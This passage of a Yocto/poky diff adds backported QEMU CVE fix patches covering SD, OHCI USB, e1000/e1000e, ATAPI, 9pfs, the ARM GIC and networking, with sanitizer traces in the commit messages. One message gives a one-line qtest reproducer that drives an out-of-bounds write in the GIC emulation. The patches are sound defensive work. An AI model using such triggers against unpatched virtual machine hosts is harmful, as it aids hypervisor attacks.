<20200901140411.112150-3-f4bug@amsat.org> + +Upstream-Status: Backport +CVE: CVE-2020-25085 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/sd/sdhci.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/sd/sdhci.c +=================================================================== +--- qemu-4.2.0.orig/hw/sd/sdhci.c ++++ qemu-4.2.0/hw/sd/sdhci.c +@@ -1129,7 +1129,7 @@ sdhci_write(void *opaque, hwaddr offset, + break; + case SDHC_BLKSIZE: + if (!TRANSFERRING_DATA(s->prnsts)) { +- MASKED_WRITE(s->blksize, mask, value); ++ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12)); + MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16); + } + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch new file mode 100644 index 0000000000..a46b5be193 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch @@ -0,0 +1,87 @@ +From fbec359e9279ce78908b9f2af2c264e7448336af Mon Sep 17 00:00:00 2001 +From: Guenter Roeck <linux@roeck-us.net> +Date: Mon, 17 Feb 2020 12:48:10 -0800 +Subject: [PATCH] hw: usb: hcd-ohci: Move OHCISysBusState and TYPE_SYSBUS_OHCI + to include file + +We need to be able to use OHCISysBusState outside hcd-ohci.c, so move it +to its include file. + +Reviewed-by: Gerd Hoffmann <kraxel@redhat.com> +Signed-off-by: Guenter Roeck <linux@roeck-us.net> +Tested-by: Niek Linnenbank <nieklinnenbank@gmail.com> +Message-id: 20200217204812.9857-2-linux@roeck-us.net +Signed-off-by: Peter Maydell <peter.maydell@linaro.org> + +Upstream-Status: Backport +CVE: CVE-2020-25624 patch #1 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/usb/hcd-ohci.c | 15 --------------- + hw/usb/hcd-ohci.h | 16 ++++++++++++++++ + 2 files changed, 16 insertions(+), 15 deletions(-) + +diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c +index 8a94bd004a..1e6e85e86a 100644 +--- a/hw/usb/hcd-ohci.c ++++ b/hw/usb/hcd-ohci.c +@@ -1870,21 +1870,6 @@ void ohci_sysbus_die(struct OHCIState *ohci) + ohci_bus_stop(ohci); + } + +-#define TYPE_SYSBUS_OHCI "sysbus-ohci" +-#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI) +- +-typedef struct { +- /*< private >*/ +- SysBusDevice parent_obj; +- /*< public >*/ +- +- OHCIState ohci; +- char *masterbus; +- uint32_t num_ports; +- uint32_t firstport; +- dma_addr_t dma_offset; +-} OHCISysBusState; +- + static void ohci_realize_pxa(DeviceState *dev, Error **errp) + { + OHCISysBusState *s = SYSBUS_OHCI(dev); +diff --git a/hw/usb/hcd-ohci.h b/hw/usb/hcd-ohci.h +index 16e3f1e13a..5c8819aedf 100644 +--- a/hw/usb/hcd-ohci.h ++++ b/hw/usb/hcd-ohci.h +@@ -22,6 +22,7 @@ + #define HCD_OHCI_H + + #include "sysemu/dma.h" ++#include "hw/usb.h" + + /* Number of Downstream Ports on the root hub: */ + #define OHCI_MAX_PORTS 15 +@@ -90,6 +91,21 @@ typedef struct OHCIState { + void (*ohci_die)(struct OHCIState *ohci); + } OHCIState; + ++#define TYPE_SYSBUS_OHCI "sysbus-ohci" ++#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI) ++ ++typedef struct { ++ /*< private >*/ ++ SysBusDevice parent_obj; ++ /*< public >*/ ++ ++ OHCIState ohci; ++ char *masterbus; ++ uint32_t num_ports; ++ uint32_t firstport; ++ dma_addr_t dma_offset; ++} OHCISysBusState; ++ + extern const VMStateDescription vmstate_ohci_state; + + void usb_ohci_init(OHCIState *ohci, DeviceState *dev, uint32_t num_ports, +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch new file mode 100644 index 0000000000..8c1275b2f4 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch @@ -0,0 +1,101 @@ +From 1328fe0c32d5474604105b8105310e944976b058 Mon Sep 17 00:00:00 2001 +From: Prasad J Pandit <pjp@fedoraproject.org> +Date: Tue, 15 Sep 2020 23:52:58 +0530 +Subject: [PATCH] hw: usb: hcd-ohci: check len and frame_number variables + +While servicing the OHCI transfer descriptors(TD), OHCI host +controller derives variables 'start_addr', 'end_addr', 'len' +etc. from values supplied by the host controller driver. +Host controller driver may supply values such that using +above variables leads to out-of-bounds access issues. +Add checks to avoid them. + +AddressSanitizer: stack-buffer-overflow on address 0x7ffd53af76a0 + READ of size 2 at 0x7ffd53af76a0 thread T0 + #0 ohci_service_iso_td ../hw/usb/hcd-ohci.c:734 + #1 ohci_service_ed_list ../hw/usb/hcd-ohci.c:1180 + #2 ohci_process_lists ../hw/usb/hcd-ohci.c:1214 + #3 ohci_frame_boundary ../hw/usb/hcd-ohci.c:1257 + #4 timerlist_run_timers ../util/qemu-timer.c:572 + #5 qemu_clock_run_timers ../util/qemu-timer.c:586 + #6 qemu_clock_run_all_timers ../util/qemu-timer.c:672 + #7 main_loop_wait ../util/main-loop.c:527 + #8 qemu_main_loop ../softmmu/vl.c:1676 + #9 main ../softmmu/main.c:50 + +Reported-by: Gaoning Pan <pgn@zju.edu.cn> +Reported-by: Yongkang Jia <j_kangel@163.com> +Reported-by: Yi Ren <yunye.ry@alibaba-inc.com> +Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org> +Message-id: 20200915182259.68522-2-ppandit@redhat.com +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-25624 patch #2 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/usb/hcd-ohci.c | 24 ++++++++++++++++++++++-- + 1 file changed, 22 insertions(+), 2 deletions(-) + +diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c +index 1e6e85e86a..9dc59101f9 100644 +--- a/hw/usb/hcd-ohci.c ++++ b/hw/usb/hcd-ohci.c +@@ -731,7 +731,11 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed, + } + + start_offset = iso_td.offset[relative_frame_number]; +- next_offset = iso_td.offset[relative_frame_number + 1]; ++ if (relative_frame_number < frame_count) { ++ next_offset = iso_td.offset[relative_frame_number + 1]; ++ } else { ++ next_offset = iso_td.be; ++ } + + if (!(OHCI_BM(start_offset, TD_PSW_CC) & 0xe) || + ((relative_frame_number < frame_count) && +@@ -764,7 +768,12 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed, + } + } else { + /* Last packet in the ISO TD */ +- end_addr = iso_td.be; ++ end_addr = next_offset; ++ } ++ ++ if (start_addr > end_addr) { ++ trace_usb_ohci_iso_td_bad_cc_overrun(start_addr, end_addr); ++ return 1; + } + + if ((start_addr & OHCI_PAGE_MASK) != (end_addr & OHCI_PAGE_MASK)) { +@@ -773,6 +782,9 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed, + } else { + len = end_addr - start_addr + 1; + } ++ if (len > sizeof(ohci->usb_buf)) { ++ len = sizeof(ohci->usb_buf); ++ } + + if (len && dir != OHCI_TD_DIR_IN) { + if (ohci_copy_iso_td(ohci, start_addr, end_addr, ohci->usb_buf, len, +@@ -975,8 +987,16 @@ static int ohci_service_td(OHCIState *ohci, struct ohci_ed *ed) + if ((td.cbp & 0xfffff000) != (td.be & 0xfffff000)) { + len = (td.be & 0xfff) + 0x1001 - (td.cbp & 0xfff); + } else { ++ if (td.cbp > td.be) { ++ trace_usb_ohci_iso_td_bad_cc_overrun(td.cbp, td.be); ++ ohci_die(ohci); ++ return 1; ++ } + len = (td.be - td.cbp) + 1; + } ++ if (len > sizeof(ohci->usb_buf)) { ++ len = sizeof(ohci->usb_buf); ++ } + + pktlen = len; + if (len && dir != OHCI_TD_DIR_IN) { +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch new file mode 100644 index 0000000000..374d7c4562 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch @@ -0,0 +1,42 @@ +From 1be90ebecc95b09a2ee5af3f60c412b45a766c4f Mon Sep 17 00:00:00 2001 +From: Prasad J Pandit <pjp@fedoraproject.org> +Date: Tue, 15 Sep 2020 23:52:59 +0530 +Subject: [PATCH] hw: usb: hcd-ohci: check for processed TD before retire + +While servicing OHCI transfer descriptors(TD), ohci_service_iso_td +retires a TD if it has passed its time frame. It does not check if +the TD was already processed once and holds an error code in TD_CC. +It may happen if the TD list has a loop. Add check to avoid an +infinite loop condition. + +Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org> +Reviewed-by: Li Qiang <liq3ea@gmail.com> +Message-id: 20200915182259.68522-3-ppandit@redhat.com +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-25625 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/usb/hcd-ohci.c | 4 ++++ + 1 file changed, 4 insertions(+) + +diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c +index 9dc59101f9..8b912e95d3 100644 +--- a/hw/usb/hcd-ohci.c ++++ b/hw/usb/hcd-ohci.c +@@ -691,6 +691,10 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed, + the next ISO TD of the same ED */ + trace_usb_ohci_iso_td_relative_frame_number_big(relative_frame_number, + frame_count); ++ if (OHCI_CC_DATAOVERRUN == OHCI_BM(iso_td.flags, TD_CC)) { ++ /* avoid infinite loop */ ++ return 1; ++ } + OHCI_SET_BM(iso_td.flags, TD_CC, OHCI_CC_DATAOVERRUN); + ed->head &= ~OHCI_DPTR_MASK; + ed->head |= (iso_td.next & OHCI_DPTR_MASK); +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch new file mode 100644 index 0000000000..7bfc2beecb --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch @@ -0,0 +1,49 @@ +From 7564bf7701f00214cdc8a678a9f7df765244def1 Mon Sep 17 00:00:00 2001 +From: Prasad J Pandit <pjp@fedoraproject.org> +Date: Wed, 21 Oct 2020 11:35:50 +0530 +Subject: [PATCH] net: remove an assert call in eth_get_gso_type + +eth_get_gso_type() routine returns segmentation offload type based on +L3 protocol type. It calls g_assert_not_reached if L3 protocol is +unknown, making the following return statement unreachable. Remove the +g_assert call, it maybe triggered by a guest user. + +Reported-by: Gaoning Pan <pgn@zju.edu.cn> +Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upsteram-Status: Backport +CVE: CVE-2020-27617 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + net/eth.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/net/eth.c b/net/eth.c +index 0c1d413ee2..1e0821c5f8 100644 +--- a/net/eth.c ++++ b/net/eth.c +@@ -16,6 +16,7 @@ + */ + + #include "qemu/osdep.h" ++#include "qemu/log.h" + #include "net/eth.h" + #include "net/checksum.h" + #include "net/tap.h" +@@ -71,9 +72,8 @@ eth_get_gso_type(uint16_t l3_proto, uint8_t *l3_hdr, uint8_t l4proto) + return VIRTIO_NET_HDR_GSO_TCPV6 | ecn_state; + } + } +- +- /* Unsupported offload */ +- g_assert_not_reached(); ++ qemu_log_mask(LOG_UNIMP, "%s: probably not GSO frame, " ++ "unknown L3 protocol: 0x%04"PRIx16"\n", __func__, l3_proto); + + return VIRTIO_NET_HDR_GSO_NONE | ecn_state; + } +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch new file mode 100644 index 0000000000..756b1c1495 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch @@ -0,0 +1,48 @@ +From c2cb511634012344e3d0fe49a037a33b12d8a98a Mon Sep 17 00:00:00 2001 +From: Prasad J Pandit <pjp@fedoraproject.org> +Date: Wed, 11 Nov 2020 18:36:36 +0530 +Subject: [PATCH] hw/net/e1000e: advance desc_offset in case of null descriptor + +While receiving packets via e1000e_write_packet_to_guest() routine, +'desc_offset' is advanced only when RX descriptor is processed. And +RX descriptor is not processed if it has NULL buffer address. +This may lead to an infinite loop condition. Increament 'desc_offset' +to process next descriptor in the ring to avoid infinite loop. + +Reported-by: Cheol-woo Myung <330cjfdn@gmail.com> +Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-28916 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/net/e1000e_core.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/hw/net/e1000e_core.c b/hw/net/e1000e_core.c +index d8b9e4b2f4..095c01ebc6 100644 +--- a/hw/net/e1000e_core.c ++++ b/hw/net/e1000e_core.c +@@ -1596,13 +1596,13 @@ e1000e_write_packet_to_guest(E1000ECore *core, struct NetRxPkt *pkt, + (const char *) &fcs_pad, e1000x_fcs_len(core->mac)); + } + } +- desc_offset += desc_size; +- if (desc_offset >= total_size) { +- is_last = true; +- } + } else { /* as per intel docs; skip descriptors with null buf addr */ + trace_e1000e_rx_null_descriptor(); + } ++ desc_offset += desc_size; ++ if (desc_offset >= total_size) { ++ is_last = true; ++ } + + e1000e_write_rx_descr(core, desc, is_last ? core->rx_pkt : NULL, + rss_info, do_ps ? ps_hdr_len : 0, &bastate.written); +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch new file mode 100644 index 0000000000..1528d5c2fd --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch @@ -0,0 +1,45 @@ +From 813212288970c39b1800f63e83ac6e96588095c6 Mon Sep 17 00:00:00 2001 +From: Paolo Bonzini <pbonzini@redhat.com> +Date: Tue, 1 Dec 2020 13:09:26 +0100 +Subject: [PATCH] ide: atapi: assert that the buffer pointer is in range + +A case was reported where s->io_buffer_index can be out of range. +The report skimped on the details but it seems to be triggered +by s->lba == -1 on the READ/READ CD paths (e.g. by sending an +ATAPI command with LBA = 0xFFFFFFFF). For now paper over it +with assertions. The first one ensures that there is no overflow +when incrementing s->io_buffer_index, the second checks for the +buffer overrun. + +Note that the buffer overrun is only a read, so I am not sure +if the assertion failure is actually less harmful than the overrun. + +Signed-off-by: Paolo Bonzini <pbonzini@redhat.com> +Message-id: 20201201120926.56559-1-pbonzini@redhat.com +Reviewed-by: Kevin Wolf <kwolf@redhat.com> +Signed-off-by: Peter Maydell <peter.maydell@linaro.org> + +Upstream-Status: Backport +CVE: CVE-2020-29443 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/ide/atapi.c | 2 ++ + 1 file changed, 2 insertions(+) + +diff --git a/hw/ide/atapi.c b/hw/ide/atapi.c +index 14a2b0bb2f..e79157863f 100644 +--- a/hw/ide/atapi.c ++++ b/hw/ide/atapi.c +@@ -276,6 +276,8 @@ void ide_atapi_cmd_reply_end(IDEState *s) + s->packet_transfer_size -= size; + s->elementary_transfer_size -= size; + s->io_buffer_index += size; ++ assert(size <= s->io_buffer_total_len); ++ assert(s->io_buffer_index <= s->io_buffer_total_len); + + /* Some adapters process PIO data right away. In that case, we need + * to avoid mutual recursion between ide_transfer_start +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch new file mode 100644 index 0000000000..1b8c77f838 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch @@ -0,0 +1,81 @@ +From c2d2d14e8deece958bbc4fc649d22c3564bc4e7e Mon Sep 17 00:00:00 2001 +From: Greg Kurz <groug@kaod.org> +Date: Thu, 14 Jan 2021 17:04:12 +0100 +Subject: [PATCH] 9pfs: Fully restart unreclaim loop (CVE-2021-20181) + +Depending on the client activity, the server can be asked to open a huge +number of file descriptors and eventually hit RLIMIT_NOFILE. This is +currently mitigated using a reclaim logic : the server closes the file +descriptors of idle fids, based on the assumption that it will be able +to re-open them later. This assumption doesn't hold of course if the +client requests the file to be unlinked. In this case, we loop on the +entire fid list and mark all related fids as unreclaimable (the reclaim +logic will just ignore them) and, of course, we open or re-open their +file descriptors if needed since we're about to unlink the file. + +This is the purpose of v9fs_mark_fids_unreclaim(). Since the actual +opening of a file can cause the coroutine to yield, another client +request could possibly add a new fid that we may want to mark as +non-reclaimable as well. The loop is thus restarted if the re-open +request was actually transmitted to the backend. This is achieved +by keeping a reference on the first fid (head) before traversing +the list. + +This is wrong in several ways: +- a potential clunk request from the client could tear the first + fid down and cause the reference to be stale. This leads to a + use-after-free error that can be detected with ASAN, using a + custom 9p client +- fids are added at the head of the list : restarting from the + previous head will always miss fids added by a some other + potential request + +All these problems could be avoided if fids were being added at the +end of the list. This can be achieved with a QSIMPLEQ, but this is +probably too much change for a bug fix. For now let's keep it +simple and just restart the loop from the current head. + +Fixes: CVE-2021-20181 +Buglink: https://bugs.launchpad.net/qemu/+bug/1911666 +Reported-by: Zero Day Initiative <zdi-disclosures@trendmicro.com> +Reviewed-by: Christian Schoenebeck <qemu_oss@crudebyte.com> +Reviewed-by: Stefano Stabellini <sstabellini@kernel.org> +Message-Id: <161064025265.1838153.15185571283519390907.stgit@bahia.lan> +Signed-off-by: Greg Kurz <groug@kaod.org> + +Upstream-Status: Backport [89fbea8737e8f7b954745a1ffc4238d377055305] +CVE: CVE-2021-20181 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/9pfs/9p.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c +index 94df440fc..6026b51a1 100644 +--- a/hw/9pfs/9p.c ++++ b/hw/9pfs/9p.c +@@ -502,9 +502,9 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path) + { + int err; + V9fsState *s = pdu->s; +- V9fsFidState *fidp, head_fid; ++ V9fsFidState *fidp; + +- head_fid.next = s->fid_list; ++again: + for (fidp = s->fid_list; fidp; fidp = fidp->next) { + if (fidp->path.size != path->size) { + continue; +@@ -524,7 +524,7 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path) + * switched to the worker thread + */ + if (err == 0) { +- fidp = &head_fid; ++ goto again; + } + } + } +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch new file mode 100644 index 0000000000..46c9ab4184 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch @@ -0,0 +1,67 @@ +From edfe2eb4360cde4ed5d95bda7777edcb3510f76a Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org> +Date: Sun, 31 Jan 2021 11:34:01 +0100 +Subject: [PATCH] hw/intc/arm_gic: Fix interrupt ID in GICD_SGIR register +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Per the ARM Generic Interrupt Controller Architecture specification +(document "ARM IHI 0048B.b (ID072613)"), the SGIINTID field is 4 bit, +not 10: + + - 4.3 Distributor register descriptions + - 4.3.15 Software Generated Interrupt Register, GICD_SG + + - Table 4-21 GICD_SGIR bit assignments + + The Interrupt ID of the SGI to forward to the specified CPU + interfaces. The value of this field is the Interrupt ID, in + the range 0-15, for example a value of 0b0011 specifies + Interrupt ID 3. + +Correct the irq mask to fix an undefined behavior (which eventually +lead to a heap-buffer-overflow, see [Buglink]): + + $ echo 'writel 0x8000f00 0xff4affb0' | qemu-system-aarch64 -M virt,accel=qtest -qtest stdio + [I 1612088147.116987] OPENED + [R +0.278293] writel 0x8000f00 0xff4affb0 + ../hw/intc/arm_gic.c:1498:13: runtime error: index 944 out of bounds for type 'uint8_t [16][8]' + SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ../hw/intc/arm_gic.c:1498:13 + +This fixes a security issue when running with KVM on Arm with +kernel-irqchip=off. (The default is kernel-irqchip=on, which is +unaffected, and which is also the correct choice for performance.) + +Cc: qemu-stable@nongnu.org +Fixes: CVE-2021-20221 +Fixes: 9ee6e8bb853 ("ARMv7 support.") +Buglink: https://bugs.launchpad.net/qemu/+bug/1913916 +Buglink: https://bugs.launchpad.net/qemu/+bug/1913917 +Reported-by: Alexander Bulekov <alxndr@bu.edu> +Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org> +Message-id: 20210131103401.217160-1-f4bug@amsat.org +Reviewed-by: Peter Maydell <peter.maydell@linaro.org> +Signed-off-by: Peter Maydell <peter.maydell@linaro.org> + +Upstream-Status: Backport +CVE: CVE-2021-20221 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/intc/arm_gic.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/intc/arm_gic.c +=================================================================== +--- qemu-4.2.0.orig/hw/intc/arm_gic.c ++++ qemu-4.2.0/hw/intc/arm_gic.c +@@ -1455,7 +1455,7 @@ static void gic_dist_writel(void *opaque + int target_cpu; + + cpu = gic_get_current_cpu(s); +- irq = value & 0x3ff; ++ irq = value & 0xf; + switch ((value >> 24) & 3) { + case 0: + mask = (value >> 16) & ALL_CPU_MASK; diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch new file mode 100644 index 0000000000..7175b24e99 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch @@ -0,0 +1,55 @@ +From affdf476543405045c281a7c67d1eaedbcea8135 Mon Sep 17 00:00:00 2001 +From: Jason Wang <jasowang@redhat.com> +Date: Wed, 24 Feb 2021 13:45:28 +0800 +Subject: [PATCH] e1000: fail early for evil descriptor + +During procss_tx_desc(), driver can try to chain data descriptor with +legacy descriptor, when will lead underflow for the following +calculation in process_tx_desc() for bytes: + + if (tp->size + bytes > msh) + bytes = msh - tp->size; + +This will lead a infinite loop. So check and fail early if tp->size if +greater or equal to msh. + +Reported-by: Alexander Bulekov <alxndr@bu.edu> +Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr> +Reported-by: Ruhr-University Bochum <bugs-syssec@rub.de> +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [3de46e6fc489c52c9431a8a832ad8170a7569bd8] +CVE: CVE-2021-20257 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/e1000.c | 4 ++++ + 1 file changed, 4 insertions(+) + +diff --git a/hw/net/e1000.c b/hw/net/e1000.c +index cf22c4f07..c3564c7ce 100644 +--- a/hw/net/e1000.c ++++ b/hw/net/e1000.c +@@ -670,6 +670,9 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp) + msh = tp->tso_props.hdr_len + tp->tso_props.mss; + do { + bytes = split_size; ++ if (tp->size >= msh) { ++ goto eop; ++ } + if (tp->size + bytes > msh) + bytes = msh - tp->size; + +@@ -695,6 +698,7 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp) + tp->size += split_size; + } + ++eop: + if (!(txd_lower & E1000_TXD_CMD_EOP)) + return; + if (!(tp->cptse && tp->size < tp->tso_props.hdr_len)) { +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch new file mode 100644 index 0000000000..5bacd67481 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch @@ -0,0 +1,177 @@ +From 4b1988a29d67277d6c8ce1df52975f5616592913 Mon Sep 17 00:00:00 2001 +From: Jason Wang <jasowang@redhat.com> +Date: Wed, 24 Feb 2021 11:44:36 +0800 +Subject: [PATCH 01/10] net: introduce qemu_receive_packet() +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Some NIC supports loopback mode and this is done by calling +nc->info->receive() directly which in fact suppresses the effort of +reentrancy check that is done in qemu_net_queue_send(). + +Unfortunately we can't use qemu_net_queue_send() here since for +loopback there's no sender as peer, so this patch introduce a +qemu_receive_packet() which is used for implementing loopback mode +for a NIC with this check. + +NIC that supports loopback mode will be converted to this helper. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Cc: qemu-stable@nongnu.org +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [705df5466c98f3efdd2b68d3b31dad86858acad7] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + include/net/net.h | 5 +++++ + include/net/queue.h | 8 ++++++++ + net/net.c | 38 +++++++++++++++++++++++++++++++------- + net/queue.c | 22 ++++++++++++++++++++++ + 4 files changed, 66 insertions(+), 7 deletions(-) + +diff --git a/include/net/net.h b/include/net/net.h +index 778fc787c..03f058ecb 100644 +--- a/include/net/net.h ++++ b/include/net/net.h +@@ -143,12 +143,17 @@ void *qemu_get_nic_opaque(NetClientState *nc); + void qemu_del_net_client(NetClientState *nc); + typedef void (*qemu_nic_foreach)(NICState *nic, void *opaque); + void qemu_foreach_nic(qemu_nic_foreach func, void *opaque); ++int qemu_can_receive_packet(NetClientState *nc); + int qemu_can_send_packet(NetClientState *nc); + ssize_t qemu_sendv_packet(NetClientState *nc, const struct iovec *iov, + int iovcnt); + ssize_t qemu_sendv_packet_async(NetClientState *nc, const struct iovec *iov, + int iovcnt, NetPacketSent *sent_cb); + ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size); ++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size); ++ssize_t qemu_receive_packet_iov(NetClientState *nc, ++ const struct iovec *iov, ++ int iovcnt); + ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size); + ssize_t qemu_send_packet_async(NetClientState *nc, const uint8_t *buf, + int size, NetPacketSent *sent_cb); +diff --git a/include/net/queue.h b/include/net/queue.h +index c0269bb1d..9f2f289d7 100644 +--- a/include/net/queue.h ++++ b/include/net/queue.h +@@ -55,6 +55,14 @@ void qemu_net_queue_append_iov(NetQueue *queue, + + void qemu_del_net_queue(NetQueue *queue); + ++ssize_t qemu_net_queue_receive(NetQueue *queue, ++ const uint8_t *data, ++ size_t size); ++ ++ssize_t qemu_net_queue_receive_iov(NetQueue *queue, ++ const struct iovec *iov, ++ int iovcnt); ++ + ssize_t qemu_net_queue_send(NetQueue *queue, + NetClientState *sender, + unsigned flags, +diff --git a/net/net.c b/net/net.c +index 6a2c3d956..5e15e5d27 100644 +--- a/net/net.c ++++ b/net/net.c +@@ -528,6 +528,17 @@ int qemu_set_vnet_be(NetClientState *nc, bool is_be) + #endif + } + ++int qemu_can_receive_packet(NetClientState *nc) ++{ ++ if (nc->receive_disabled) { ++ return 0; ++ } else if (nc->info->can_receive && ++ !nc->info->can_receive(nc)) { ++ return 0; ++ } ++ return 1; ++} ++ + int qemu_can_send_packet(NetClientState *sender) + { + int vm_running = runstate_is_running(); +@@ -540,13 +551,7 @@ int qemu_can_send_packet(NetClientState *sender) + return 1; + } + +- if (sender->peer->receive_disabled) { +- return 0; +- } else if (sender->peer->info->can_receive && +- !sender->peer->info->can_receive(sender->peer)) { +- return 0; +- } +- return 1; ++ return qemu_can_receive_packet(sender->peer); + } + + static ssize_t filter_receive_iov(NetClientState *nc, +@@ -679,6 +684,25 @@ ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size) + return qemu_send_packet_async(nc, buf, size, NULL); + } + ++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size) ++{ ++ if (!qemu_can_receive_packet(nc)) { ++ return 0; ++ } ++ ++ return qemu_net_queue_receive(nc->incoming_queue, buf, size); ++} ++ ++ssize_t qemu_receive_packet_iov(NetClientState *nc, const struct iovec *iov, ++ int iovcnt) ++{ ++ if (!qemu_can_receive_packet(nc)) { ++ return 0; ++ } ++ ++ return qemu_net_queue_receive_iov(nc->incoming_queue, iov, iovcnt); ++} ++ + ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size) + { + return qemu_send_packet_async_with_flags(nc, QEMU_NET_PACKET_FLAG_RAW, +diff --git a/net/queue.c b/net/queue.c +index 19e32c80f..c872d51df 100644 +--- a/net/queue.c ++++ b/net/queue.c +@@ -182,6 +182,28 @@ static ssize_t qemu_net_queue_deliver_iov(NetQueue *queue, + return ret; + } + ++ssize_t 